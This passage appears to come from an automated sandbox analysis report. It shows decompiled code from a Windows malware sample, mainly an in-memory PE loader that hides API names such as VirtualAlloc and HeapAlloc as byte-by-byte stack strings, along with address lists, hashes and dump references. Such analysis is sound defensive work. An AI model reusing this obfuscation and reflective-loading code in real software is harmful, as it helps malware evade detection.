						}
						E00402EB0( *((intOrPtr*)(_t127 + 8)), _t132);
					}
					_v32 = 0x56;
					_v31 = 0x69;
					_v30 = 0x72;
					_v29 = 0x74;
					_v28 = 0x75;
					_v27 = 0x61;
					_v26 = 0x6c;
					_v25 = 0x46;
					_v24 = 0x72;
					_v23 = 0x65;
					_v22 = 0x65;
					_v21 = 0;
					GetProcAddress(LoadLibraryA( &_v72),  &_v32);
					_t118 =  *(_t127 + 4);
					if(_t118 != 0) {
						VirtualFree(_t118, 0, 0x8000); // executed
					}
					_v56 = 0x48;
					_v55 = 0x65;
					_v54 = 0x61;
					_v53 = 0x70;
					_v52 = 0x46;
					_v51 = 0x72;
					_v50 = 0x65;
					_v49 = 0x65;
					_v48 = 0;
					_t97 = GetProcAddress(LoadLibraryA( &_v72),  &_v56);
					_t128 = _t97;
					_t122 =  &_v20;
					_v12 = 0x73;
					_v11 = 0x73;
					_v20 = 0x47;
					_v19 = 0x65;
					_v18 = 0x74;
					_v17 = 0x50;
					_v16 = 0x72;
					_v15 = 0x6f;
					_v14 = 0x63;
					_v13 = 0x65;
					_v10 = 0x48;
					_v9 = 0x65;
					_v8 = 0x61;
					_v7 = 0x70;
					_v6 = 0;
					_t101 = GetProcAddress(LoadLibraryA( &_v72),  &_v20);
					_t89 =  *_t97( *_t101(0, _t127));
					_pop(_t113);
				}
				return E0042569C(_t89, _t113, _v4 ^ _t134, _t122, _t127, _t128);
			}

0x004038b0
0x004038b0
0x004038b0
0x004038b3
0x004038b8
0x004038ba
0x004038bf
0x004038c3
0x004038cc
0x004038d0
0x004038d6
0x004038d7
0x004038d8
0x004038db
0x004038dd
0x004038dd
0x004038e5
0x004038e6
0x004038ea
0x004038f0
0x004038f1
0x004038f7
0x004038fc
0x00403901
0x00403906
0x0040390a
0x0040390f
0x00403914
0x00403919
0x0040391e
0x00403923
0x00403928
0x0040392f
0x00403931
0x0040393f
0x00403944
0x00403949
0x0040394d
0x00403951
0x00403956
0x0040395b
0x00403960
0x00403965
0x0040396a
0x0040396f
0x00403980
0x00403984
0x00403986
0x00403986
0x0040398d
0x00403990
0x00403995
0x00403995
0x00403999
0x0040399c
0x00403986
0x004039a4
0x004039a4
0x004039b9
0x004039be
0x004039c3
0x004039c8
0x004039cd
0x004039d2
0x004039d7
0x004039dc
0x004039e1
0x004039e6
0x004039ea
0x004039ee
0x004039f6
0x004039f8
0x004039fd
0x00403a07
0x00403a07
0x00403a13
0x00403a18
0x00403a1c
0x00403a21
0x00403a26
0x00403a2b
0x00403a30
0x00403a34
0x00403a38
0x00403a40
0x00403a42
0x00403a46
0x00403a4a
0x00403a4e
0x00403a58
0x00403a5d
0x00403a61
0x00403a66
0x00403a6b
0x00403a70
0x00403a75
0x00403a7a
0x00403a7e
0x00403a83
0x00403a87
0x00403a8c
0x00403a91
0x00403a9d
0x00403aa5
0x00403aa8
0x00403aa8
0x00403ab8

APIs

LoadLibraryA.KERNEL32 ref: 00403974
GetProcAddress.KERNEL32(00000000), ref: 0040397B
FreeLibrary.KERNELBASE(?), ref: 00403995
LoadLibraryA.KERNEL32 ref: 004039F3
GetProcAddress.KERNEL32(00000000), ref: 004039F6
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00403A07
LoadLibraryA.KERNEL32(?,?), ref: 00403A3D
GetProcAddress.KERNEL32(00000000), ref: 00403A40
LoadLibraryA.KERNEL32 ref: 00403A96
GetProcAddress.KERNEL32(00000000), ref: 00403A9D

Strings

H, xrefs: 00403A7E
3, xrefs: 0040390A
p, xrefs: 00403A21
i, xrefs: 00403951
K, xrefs: 004038F7
c, xrefs: 00403A75
l, xrefs: 004039D7
a, xrefs: 00403A87
p, xrefs: 00403A8C
r, xrefs: 0040395B
r, xrefs: 004039E1
., xrefs: 00403914
y, xrefs: 0040396A
V, xrefs: 004039B9
t, xrefs: 004039C8
a, xrefs: 00403A1C
P, xrefs: 00403A66
R, xrefs: 004038FC
a, xrefs: 004039D2
F, xrefs: 00403A26
t, xrefs: 00403A61
d, xrefs: 00403919
G, xrefs: 00403A58
N, xrefs: 00403901
r, xrefs: 00403944
r, xrefs: 00403A6B
2, xrefs: 0040390F
o, xrefs: 00403A70
b, xrefs: 00403956
r, xrefs: 00403965
r, xrefs: 00403A2B
i, xrefs: 004039BE
l, xrefs: 00403923
r, xrefs: 004039C3
u, xrefs: 004039CD
F, xrefs: 0040393F
H, xrefs: 00403A13
l, xrefs: 0040391E
F, xrefs: 004039DC
a, xrefs: 00403960

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressLoadProc$Free$Virtual
String ID: .$2$3$F$F$F$G$H$H$K$N$P$R$V$a$a$a$a$b$c$d$i$i$l$l$l$o$p$p$r$r$r$r$r$r$r$t$t$u$y
API String ID: 2619102872-2346325977
Opcode ID: 6d77b60b7dc64c3754b119bb8a5fdd21edddc3c74b34c997db90a06b5291abc3
Instruction ID: 51cf9c5e07e4b655dca4e8132765ca20b78b33567c0a5749840054a9a1867ab4
Opcode Fuzzy Hash: 6d77b60b7dc64c3754b119bb8a5fdd21edddc3c74b34c997db90a06b5291abc3
Instruction Fuzzy Hash: 5B61176140C3C0DAD312CB68844874BFFE56BA6748F48499EF1D857282C7BAD658C7BB

Uniqueness

Uniqueness Score: -1.00%

Function 00403570, Relevance: 82.5, APIs: 9, Strings: 38, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00403570(short* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _t88;
				void* _t94;
				_Unknown_base(*)()* _t98;
				_Unknown_base(*)()* _t101;
				intOrPtr _t109;
				intOrPtr _t118;
				intOrPtr* _t121;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t163;
				intOrPtr* _t166;
				signed int _t170;

				_t130 = __ebx;
				_t88 =  *0x44f5d0; // 0x765b253d
				 *(_t170 + 0x44) = _t88 ^ _t170;
				if( *__ebx == 0x5a4d) {
					_t166 =  *((intOrPtr*)(__ebx + 0x3c)) + __ebx;
					if( *_t166 == 0x4550) {
						_push(__esi);
						_push(__edi);
						 *((char*)(_t170 + 0x15)) = 0x45;
						 *(_t170 + 0x18) = 0x45;
						 *((char*)(_t170 + 0x1c)) = 0x4b;
						 *((char*)(_t170 + 0x1e)) = 0x52;
						 *((char*)(_t170 + 0x1f)) = 0x4e;
						 *((char*)(_t170 + 0x21)) = 0x4c;
						 *((char*)(_t170 + 0x22)) = 0x33;
						 *((char*)(_t170 + 0x23)) = 0x32;
						 *(_t170 + 0x24) = 0x2e;
						 *((char*)(_t170 + 0x25)) = 0x64;
						 *((char*)(_t170 + 0x26)) = 0x6c;
						 *((char*)(_t170 + 0x27)) = 0x6c;
						 *((char*)(_t170 + 0x28)) = 0;
						 *((char*)(_t170 + 0x38)) = 0x56;
						 *((char*)(_t170 + 0x39)) = 0x69;
						 *((char*)(_t170 + 0x3a)) = 0x72;
						 *((char*)(_t170 + 0x3b)) = 0x74;
						 *((char*)(_t170 + 0x3c)) = 0x75;
						 *((char*)(_t170 + 0x3d)) = 0x61;
						 *((char*)(_t170 + 0x3e)) = 0x6c;
						 *((char*)(_t170 + 0x3f)) = 0x41;
						 *(_t170 + 0x40) = 0x6c;
						 *((char*)(_t170 + 0x41)) = 0x6c;
						 *((char*)(_t170 + 0x42)) = 0x6f;
						 *((char*)(_t170 + 0x43)) = 0x63;
						 *(_t170 + 0x44) = 0;
						 *((intOrPtr*)(_t170 + 0x20)) = GetProcAddress(LoadLibraryA(_t170 + 0x18), _t170 + 0x30);
						_t94 = VirtualAlloc( *(_t166 + 0x34),  *(_t166 + 0x50), 0x2000, 4); // executed
						_t161 = _t94;
						if(_t161 != 0) {
							L6:
							 *((char*)(_t170 + 0x48)) = 0x73;
							 *((char*)(_t170 + 0x49)) = 0x73;
							_t40 = _t170 + 0x40; // 0x6c
							 *((char*)(_t170 + 0x48)) = 0x47;
							 *((char*)(_t170 + 0x49)) = 0x65;
							 *((char*)(_t170 + 0x4a)) = 0x74;
							 *((char*)(_t170 + 0x4b)) = 0x50;
							 *((char*)(_t170 + 0x4c)) = 0x72;
							 *((char*)(_t170 + 0x4d)) = 0x6f;
							 *((char*)(_t170 + 0x4e)) = 0x63;
							 *((char*)(_t170 + 0x4f)) = 0x65;
							 *((char*)(_t170 + 0x52)) = 0x48;
							 *((char*)(_t170 + 0x53)) = 0x65;
							 *((char*)(_t170 + 0x54)) = 0x61;
							 *((char*)(_t170 + 0x55)) = 0x70;
							 *((char*)(_t170 + 0x56)) = 0;
							_t98 = GetProcAddress(LoadLibraryA(_t170 + 0x18), _t40);
							_t55 = _t170 + 0x24; // 0x2e
							 *(_t170 + 0xc) = _t98;
							 *((char*)(_t170 + 0x2c)) = 0x48;
							 *((char*)(_t170 + 0x2d)) = 0x65;
							 *((char*)(_t170 + 0x2e)) = 0x61;
							 *((char*)(_t170 + 0x2f)) = 0x70;
							 *(_t170 + 0x30) = 0x41;
							 *((char*)(_t170 + 0x31)) = 0x6c;
							 *((char*)(_t170 + 0x32)) = 0x6c;
							 *((char*)(_t170 + 0x33)) = 0x6f;
							 *((char*)(_t170 + 0x34)) = 0x63;
							 *((char*)(_t170 + 0x35)) = 0;
							_t101 = GetProcAddress(LoadLibraryA(_t170 + 0x18), _t55);
							_t157 =  *_t101( *(_t170 + 0x14)(0, 0x14));
							 *(_t157 + 4) = _t161;
							 *((intOrPtr*)(_t157 + 0xc)) = 0;
							 *((intOrPtr*)(_t157 + 8)) = 0;
							 *((intOrPtr*)(_t157 + 0x10)) = 0;
							VirtualAlloc(_t161,  *(_t166 + 0x50), 0x1000, 4);
							 *(_t170 + 0xc) = VirtualAlloc(_t161,  *(_t166 + 0x54), 0x1000, 4);
							E0042D2F0(_t130, _t157, _t161, _t106, _t130,  *(_t130 + 0x3c) +  *(_t166 + 0x54));
							_t153 =  *(_t130 + 0x3c);
							_t109 =  *(_t170 + 0x18) +  *(_t130 + 0x3c);
							 *_t157 = _t109;
							 *(_t109 + 0x34) = _t161;
							E00402FC0(_t166, _t166, _t130, _t157);
							_t170 = _t170 + 0x14;
							_t112 = _t161 !=  *(_t166 + 0x34);
							if(_t161 !=  *(_t166 + 0x34)) {
								E004034F0(_t157, _t112);
								_t170 = _t170 + 4;
							}
							if(E00403320(_t157) == 0) {
								L12:
								E004038B0(_t157, _t166);
								goto L13;
							} else {
								E00403140(_t157);
								_t118 =  *((intOrPtr*)( *_t157 + 0x28));
								if(_t118 == 0) {
									L15:
									_pop(_t159);
									_pop(_t163);
									return E0042569C(_t157, _t130,  *(_t170 + 0x50) ^ _t170, _t153, _t159, _t163);
								} else {
									_t121 = _t118 + _t161;
									if(_t121 == 0) {
										goto L12;
									} else {
										_push(0);
										_push(1);
										_push(_t161);
										if( *_t121() != 0) {
											 *((intOrPtr*)(_t157 + 0x10)) = 1;
											goto L15;
										} else {
											goto L12;
										}
									}
								}
							}
						} else {
							_t153 =  *(_t166 + 0x50);
							_t161 =  *((intOrPtr*)(_t170 + 0x20))(_t94,  *(_t166 + 0x50), 0x2000, 4);
							if(_t161 == 0) {
								L13:
								_pop(_t158);
								_pop(_t162);
								return E0042569C(0, _t130,  *(_t170 + 0x44) ^ _t170, _t153, _t158, _t162);
							} else {
								goto L6;
							}
						}
					} else {
						return E0042569C(0, __ebx,  *(_t170 + 0x44) ^ _t170, __edx, __edi, __esi);
					}
				} else {
					return E0042569C(0, __ebx,  *(_t170 + 0x44) ^ _t170, __edx, __edi, __esi);
				}
			}

0x00403570
0x00403573
0x0040357a
0x00403583
0x0040359a
0x004035a3
0x004035b7
0x004035ba
0x004035c1
0x004035c5
0x004035d3
0x004035d8
0x004035dd
0x004035e2
0x004035e7
0x004035ec
0x004035f1
0x004035f6
0x004035fb
0x00403600
0x00403605
0x0040360a
0x0040360f
0x00403614
0x00403619
0x0040361e
0x00403623
0x00403628
0x0040362d
0x00403632
0x00403637
0x0040363c
0x00403641
0x00403646
0x00403663
0x00403667
0x00403669
0x0040366d
0x00403689
0x0040368b
0x0040368f
0x00403693
0x0040369d
0x004036a2
0x004036a7
0x004036ac
0x004036b1
0x004036b6
0x004036bb
0x004036c0
0x004036c5
0x004036ca
0x004036cf
0x004036d4
0x004036d9
0x004036e1
0x004036e7
0x004036eb
0x004036f5
0x004036fa
0x004036ff
0x00403704
0x00403709
0x0040370e
0x00403713
0x00403718
0x0040371d
0x00403722
0x0040372a
0x0040373d
0x00403743
0x00403746
0x00403749
0x0040374c
0x00403759
0x00403773
0x0040377a
0x0040377f
0x00403786
0x00403789
0x0040378e
0x00403791
0x00403798
0x0040379b
0x0040379e
0x004037a3
0x004037a8
0x004037a8
0x004037b4
0x004037d5
0x004037d5
0x00000000
0x004037b6
0x004037b8
0x004037bf
0x004037c4
0x004037f5
0x004037fb
0x004037fc
0x00403808
0x004037c6
0x004037c6
0x004037c8
0x00000000
0x004037ca
0x004037ca
0x004037cc
0x004037ce
0x004037d3
0x004037ee
0x00000000
0x00000000
0x00000000
0x00000000
0x004037d3
0x004037c8
0x004037c4
0x0040366f
0x0040366f
0x0040367f
0x00403683
0x004037da
0x004037da
0x004037db
0x004037ed
0x00000000
0x00000000
0x00000000
0x00403683
0x004035a5
0x004035b6
0x004035b6
0x00403585
0x00403595
0x00403595

Strings

e, xrefs: 004036C0
3, xrefs: 004035E7
lAla, xrefs: 00403693, 00403697
a, xrefs: 004036FF
K, xrefs: 004035D3
i, xrefs: 0040360F
o, xrefs: 004036B6
e, xrefs: 004036CA
l, xrefs: 00403713
p, xrefs: 004036D4
c, xrefs: 004036BB
A, xrefs: 00403709
o, xrefs: 00403718
H, xrefs: 004036F5
r, xrefs: 00403614
p, xrefs: 00403704
V, xrefs: 0040360A
r, xrefs: 004036B1
N, xrefs: 004035DD
H, xrefs: 004036C5
e, xrefs: 004036A2
.23L, xrefs: 004036E7, 004036EF
l, xrefs: 0040370E
MZ, xrefs: 0040357E
t, xrefs: 00403619
e, xrefs: 004036FA
A, xrefs: 0040362D
a, xrefs: 004036CF
R, xrefs: 004035D8
a, xrefs: 00403623
l, xrefs: 00403628
u, xrefs: 0040361E
P, xrefs: 004036AC
t, xrefs: 004036A7
L, xrefs: 004035E2
c, xrefs: 0040371D
G, xrefs: 0040369D
2, xrefs: 004035EC

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .23L$2$3$A$A$G$H$H$K$L$MZ$N$P$R$V$a$a$a$c$c$e$e$e$e$i$l$l$l$lAla$o$o$p$p$r$r$t$t$u
API String ID: 0-2322425104
Opcode ID: 0a7a0d349843bd16624f839a677c41b88618fa83c2f17b51b6cb3e1189237c34
Instruction ID: f4beb3154294a0f0accf3de684e196bc4cb8e32a4e9d4595e55d073d5065b5c4
Opcode Fuzzy Hash: 0a7a0d349843bd16624f839a677c41b88618fa83c2f17b51b6cb3e1189237c34
Instruction Fuzzy Hash: 8D816C7050C3C09EE311DB688848B1FBFE56F96708F48495DF6C49B282D7BAD918876B

Uniqueness

Uniqueness Score: -1.00%

Function 00402FC0, Relevance: 40.4, APIs: 4, Strings: 19, Instructions: 112
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402FC0(intOrPtr __ecx, void* __ebp, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				char _v52;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t57;
				intOrPtr* _t60;
				intOrPtr _t61;
				_Unknown_base(*)()* _t65;
				void* _t66;
				void* _t73;
				long _t79;
				void* _t90;
				void* _t91;
				intOrPtr _t92;
				void* _t94;
				void* _t95;
				long* _t96;
				signed int _t100;

				_t100 =  &_v56;
				_t57 =  *0x44f5d0; // 0x765b253d
				_v4 = _t57 ^ _t100;
				_v48 = _a4;
				_t60 = _a8;
				_t85 =  *((intOrPtr*)(_t60 + 4));
				_v44 = _t60;
				_t61 =  *_t60;
				_v40 = __ecx;
				_v56 =  *((intOrPtr*)(_t60 + 4));
				_t94 = ( *(_t61 + 0x14) & 0x0000ffff) + _t61 + 0x18;
				_v52 = 0;
				if( *((short*)(_t61 + 6)) > 0) {
					_push(_t73);
					_push(_t90);
					_t96 = _t94 + 0x10;
					do {
						_v20 = 0x4b;
						_v19 = 0x45;
						_v18 = 0x52;
						_v17 = 0x4e;
						_v16 = 0x45;
						_v15 = 0x4c;
						_v14 = 0x33;
						_v13 = 0x32;
						_v12 = 0x2e;
						_v11 = 0x64;
						_v10 = 0x6c;
						_v9 = 0x6c;
						_v8 = 0;
						_v36 = 0x56;
						_v35 = 0x69;
						_v34 = 0x72;
						_v33 = 0x74;
						_v32 = 0x75;
						_v31 = 0x61;
						_v30 = 0x6c;
						_v29 = 0x41;
						_v28 = 0x6c;
						_v27 = 0x6c;
						_v26 = 0x6f;
						_v25 = 0x63;
						_v24 = 0;
						_t65 = GetProcAddress(LoadLibraryA( &_v20),  &_v36);
						_t79 =  *_t96;
						if(_t79 != 0) {
							_t66 = VirtualAlloc( *((intOrPtr*)(_t96 - 4)) + _v56, _t79, 0x1000, 4); // executed
							_t91 = _t66;
							E0042D2F0(0x6c, _t91, _t96, _t91, _t96[1] + _v48,  *_t96);
							 *(_t96 - 8) = _t91;
							goto L6;
						} else {
							_t92 =  *((intOrPtr*)(_v40 + 0x38));
							if(_t92 > 0) {
								 *(_t96 - 8) =  *_t65( *((intOrPtr*)(_t96 - 4)) + _v56, _t92, 0x1000, 4);
								E004277B0(_t92, _t71, 0, _t92);
								L6:
								_t100 = _t100 + 0xc;
							}
						}
						_t85 =  *_v44;
						_t61 = _v52 + 1;
						_t96 =  &(_t96[0xa]);
						_v52 = _t61;
					} while (_t61 < ( *( *_v44 + 6) & 0x0000ffff));
					_pop(_t90);
					_pop(_t73);
				}
				_pop(_t95);
				return E0042569C(_t61, _t73, _v4 ^ _t100, _t85, _t90, _t95);
			}

0x00402fc0
0x00402fc3
0x00402fca
0x00402fd2
0x00402fd6
0x00402fda
0x00402fdd
0x00402fe1
0x00402fe8
0x00402ff1
0x00402ff5
0x00402ff9
0x00403001
0x00403007
0x0040300f
0x00403010
0x00403015
0x0040301f
0x00403024
0x00403029
0x0040302e
0x00403033
0x00403038
0x0040303d
0x00403042
0x00403047
0x0040304c
0x00403051
0x00403055
0x00403059
0x0040305e
0x00403063
0x00403068
0x0040306d
0x00403072
0x00403077
0x0040307c
0x00403080
0x00403085
0x00403089
0x0040308d
0x00403092
0x00403097
0x004030a3
0x004030a5
0x004030a9
0x004030e6
0x004030ea
0x004030f6
0x004030fb
0x00000000
0x004030ab
0x004030af
0x004030b4
0x004030cc
0x004030cf
0x004030fe
0x004030fe
0x004030fe
0x004030b4
0x00403105
0x0040310f
0x00403112
0x00403117
0x00403117
0x00403121
0x00403123
0x00403123
0x00403128
0x00403133

APIs

LoadLibraryA.KERNEL32 ref: 0040309C
GetProcAddress.KERNEL32(00000000), ref: 004030A3
_memset.LIBCMT ref: 004030CF
VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 004030E6

Strings

t, xrefs: 0040306D
A, xrefs: 00403080
i, xrefs: 00403063
L, xrefs: 00403038
3, xrefs: 0040303D
u, xrefs: 00403072
K, xrefs: 0040301F
2, xrefs: 00403042
V, xrefs: 0040305E
o, xrefs: 0040308D
d, xrefs: 0040304C
E, xrefs: 00403024
r, xrefs: 00403068
a, xrefs: 00403077
c, xrefs: 00403092
R, xrefs: 00403029
N, xrefs: 0040302E
E, xrefs: 00403033
., xrefs: 00403047

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAllocLibraryLoadProcVirtual_memset
String ID: .$2$3$A$E$E$K$L$N$R$V$a$c$d$i$o$r$t$u
API String ID: 598480529-2294417541
Opcode ID: 0346305e49535223c98f08fae48008f6d0e774064bb9e389ba55b5dfd58237fe
Instruction ID: 210cb88b31063c619ee7429017330827fc8e4f72e1ba1ec9c39bfc77634dc98e
Opcode Fuzzy Hash: 0346305e49535223c98f08fae48008f6d0e774064bb9e389ba55b5dfd58237fe
Instruction Fuzzy Hash: 1C411A7150D3809ED351CB28C884B1BBFE5AFD6708F88585DF5C84B282C2BAD948C767

Uniqueness

Uniqueness Score: -1.00%

Function 00403320, Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 146
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00403320(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				void* _t64;
				_Unknown_base(*)()* _t69;
				intOrPtr _t71;
				struct HINSTANCE__* _t73;
				intOrPtr _t77;
				signed int _t78;
				_Unknown_base(*)()* _t80;
				signed int _t82;
				signed int _t84;
				void* _t85;
				struct HINSTANCE__* _t86;
				void* _t87;
				signed int _t100;
				void* _t101;
				void* _t102;
				intOrPtr _t103;
				signed int* _t104;
				intOrPtr* _t107;
				void* _t108;
				void* _t109;
				signed int* _t110;
				intOrPtr* _t114;
				signed int _t117;
				signed int _t124;

				_t60 =  *0x44f5d0; // 0x765b253d
				 *(_t117 + 0x2c) = _t60 ^ _t117;
				_t100 = __ecx;
				_t84 =  *(__ecx + 4);
				 *((char*)(_t117 + 0x29)) = 0x45;
				 *(_t117 + 0x2c) = 0x45;
				_t98 = 0x52;
				 *((char*)(_t117 + 0x32)) = 0x6c;
				 *((char*)(_t117 + 0x33)) = 0x6c;
				_t107 =  *((intOrPtr*)(__ecx)) + 0x80;
				 *((char*)(_t117 + 0x28)) = 0x4b;
				 *((char*)(_t117 + 0x2a)) = 0x52;
				 *((char*)(_t117 + 0x2b)) = 0x4e;
				 *((char*)(_t117 + 0x2d)) = 0x4c;
				 *((char*)(_t117 + 0x2e)) = 0x33;
				 *((char*)(_t117 + 0x2f)) = 0x32;
				 *(_t117 + 0x30) = 0x2e;
				 *((char*)(_t117 + 0x31)) = 0x64;
				 *((char*)(_t117 + 0x34)) = 0;
				 *(_t117 + 0x10) = __ecx;
				_t64 = 1;
				 *(_t117 + 0xc) = _t84;
				if( *((intOrPtr*)(_t107 + 4)) <= 0) {
					L18:
					_pop(_t101);
					_pop(_t108);
					_pop(_t85);
					return E0042569C(_t64, _t85,  *(_t117 + 0x38) ^ _t117, _t98, _t101, _t108);
				} else {
					 *((char*)(_t117 + 0x1f)) = 0x61;
					 *((char*)(_t117 + 0x23)) = 0x61;
					 *(_t117 + 0x20) = 0x64;
					 *((char*)(_t117 + 0x24)) = 0x64;
					_t24 = _t117 + 0x30; // 0x2e
					 *((char*)(_t117 + 0x24)) = 0x49;
					 *((char*)(_t117 + 0x25)) = 0x73;
					 *((char*)(_t117 + 0x26)) = 0x42;
					 *((char*)(_t117 + 0x29)) = 0x52;
					 *((char*)(_t117 + 0x2a)) = 0x65;
					 *((char*)(_t117 + 0x2d)) = 0x50;
					 *((char*)(_t117 + 0x2e)) = 0x74;
					 *((char*)(_t117 + 0x2f)) = 0x72;
					 *(_t117 + 0x30) = 0;
					_t69 = GetProcAddress(LoadLibraryA(_t24), _t117 + 0x1c);
					_push(0x14);
					_t114 =  *_t107 + _t84;
					_push(_t114);
					 *(_t117 + 0x20) = _t69;
					if( *_t69() != 0) {
						L17:
						_t64 = 1;
						goto L18;
					} else {
						while(1) {
							_t71 =  *((intOrPtr*)(_t114 + 0xc));
							if(_t71 == 0) {
								goto L17;
							}
							_t73 = LoadLibraryA(_t71 + _t84); // executed
							_t86 = _t73;
							if(_t86 == 0xffffffff) {
								L16:
								_pop(_t102);
								_pop(_t109);
								_pop(_t87);
								return E0042569C(0, _t87,  *(_t117 + 0x2c) ^ _t117, _t98, _t102, _t109);
							} else {
								_t98 =  *(_t100 + 0xc);
								_t77 = E00402D10(_t114,  *((intOrPtr*)(_t100 + 8)), 4 +  *(_t100 + 0xc) * 4);
								_t117 = _t117 + 8;
								 *((intOrPtr*)(_t100 + 8)) = _t77;
								if(_t77 == 0) {
									goto L16;
								} else {
									_t98 =  *(_t100 + 0xc);
									 *(_t77 +  *(_t100 + 0xc) * 4) = _t86;
									 *(_t100 + 0xc) =  *(_t100 + 0xc) + 1;
									_t103 =  *_t114;
									if(_t103 == 0) {
										_t98 =  *(_t117 + 0x10);
										_t104 =  *((intOrPtr*)(_t114 + 0x10)) +  *(_t117 + 0x10);
										_t110 = _t104;
									} else {
										_t82 =  *(_t117 + 0x10);
										_t104 = _t103 + _t82;
										_t110 =  *((intOrPtr*)(_t114 + 0x10)) + _t82;
									}
									_t78 =  *_t104;
									_t124 = _t78;
									if(_t124 == 0) {
										L14:
										_push(0x14);
										_t114 = _t114 + 0x14;
										_push(_t114);
										if( *(_t117 + 0x20)() != 0) {
											goto L17;
										} else {
											_t100 =  *((intOrPtr*)(_t117 + 0x14));
											_t84 =  *(_t117 + 0x10);
											continue;
										}
									} else {
										L9:
										L9:
										if(_t124 >= 0) {
											_t53 =  *(_t117 + 0x10) + 2; // 0x2
											_t98 = _t78 + _t53;
											_push(_t78 + _t53);
										} else {
											_push(_t78 & 0x0000ffff);
										}
										_t80 = GetProcAddress(_t86, ??);
										 *_t110 = _t80;
										if(_t80 == 0) {
											goto L16;
										}
										_t78 = _t104[1];
										_t104 =  &(_t104[1]);
										_t110 =  &(_t110[1]);
										if(_t78 != 0) {
											goto L9;
										} else {
											goto L14;
										}
									}
								}
							}
							goto L19;
						}
						goto L17;
					}
				}
				L19:
			}

0x00403323
0x0040332a
0x00403333
0x00403337
0x0040333a
0x0040333e
0x00403344
0x00403348
0x0040334c
0x00403350
0x00403356
0x0040335b
0x0040335f
0x00403364
0x00403369
0x0040336e
0x00403373
0x00403378
0x0040337c
0x00403385
0x00403389
0x0040338e
0x00403392
0x004034d3
0x004034d7
0x004034d8
0x004034d9
0x004034e4
0x00403398
0x0040339b
0x0040339f
0x004033a7
0x004033ab
0x004033b0
0x004033b5
0x004033ba
0x004033bf
0x004033c4
0x004033c8
0x004033cd
0x004033d2
0x004033d7
0x004033dc
0x004033e8
0x004033f0
0x004033f2
0x004033f4
0x004033f5
0x004033fd
0x004034cd
0x004034cd
0x00000000
0x00403403
0x00403403
0x00403403
0x00403408
0x00000000
0x00000000
0x00403411
0x00403417
0x0040341c
0x004034b8
0x004034b9
0x004034ba
0x004034bd
0x004034cc
0x00403422
0x00403422
0x00403431
0x00403436
0x0040343b
0x0040343e
0x00000000
0x00403440
0x00403440
0x00403443
0x00403446
0x0040344a
0x0040344f
0x00403461
0x00403465
0x00403468
0x00403451
0x00403451
0x00403458
0x0040345a
0x0040345a
0x0040346a
0x0040346c
0x0040346e
0x0040349d
0x0040349d
0x0040349f
0x004034a2
0x004034a9
0x00000000
0x004034ab
0x004034ab
0x004034af
0x00000000
0x004034af
0x00403470
0x00000000
0x00403470
0x00403470
0x0040347e
0x0040347e
0x00403482
0x00403472
0x00403477
0x00403477
0x00403484
0x0040348c
0x0040348e
0x00000000
0x00000000
0x00403490
0x00403493
0x00403496
0x0040349b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040349b
0x0040346e
0x0040343e
0x00000000
0x0040341c
0x00000000
0x00403403
0x004033fd
0x00000000

APIs

LoadLibraryA.KERNEL32(.23L,?), ref: 004033E1
GetProcAddress.KERNEL32(00000000), ref: 004033E8
LoadLibraryA.KERNELBASE(?,?,00000014), ref: 00403411

Part of subcall function 00402D10: LoadLibraryA.KERNEL32 ref: 00402DC1
